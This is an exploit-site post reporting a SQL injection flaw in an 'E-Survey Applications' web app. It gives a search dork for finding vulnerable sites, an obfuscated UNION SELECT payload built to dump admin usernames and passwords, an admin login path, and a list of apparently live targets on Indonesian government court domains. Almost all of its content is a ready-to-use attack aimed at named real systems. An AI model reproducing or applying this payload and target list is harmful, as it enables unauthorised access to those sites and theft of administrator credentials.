E-Survey Applications - SQL INJECTION

2021.06.30
id KimiHmei7 (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title : E-Survey Applications - SQL INJECTION # Vendor Homepage : N/A # Discovered By : KimiHmei7 # Author Homepage : HTTPS://TEGALSEC.ORG Dork : inurl:/penjelasan.php?id_kategorisend=2 # Injection For Getting Details Username And Password Of Admin /**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,nama_admin,0x3a3a,password))))x)--+ # Example Injection [-] http://dtc.pn-dataranhunipopu.go.id/e-survey/user/penjelasan.php?id_kategorisend=2%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,nama_admin,0x3a3a,password))))x)--+ # Admin Login Path's https://target.go.id/admin # Live Target 1. http://dtc.pn-dataranhunipopu.go.id/e-survey/user/penjelasan.php?id_kategorisend=2' 2. http://e-survey.pt-ambon.go.id/penjelasan.php?id_kategorisend=2' 3. http://e-survey.pn-dataranhunimoa.go.id/penjelasan.php?id_kategorisend=2' 4. http://e-survey.pn-maumere.go.id/user/penjelasan.php?id_kategorisend=2' etc.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top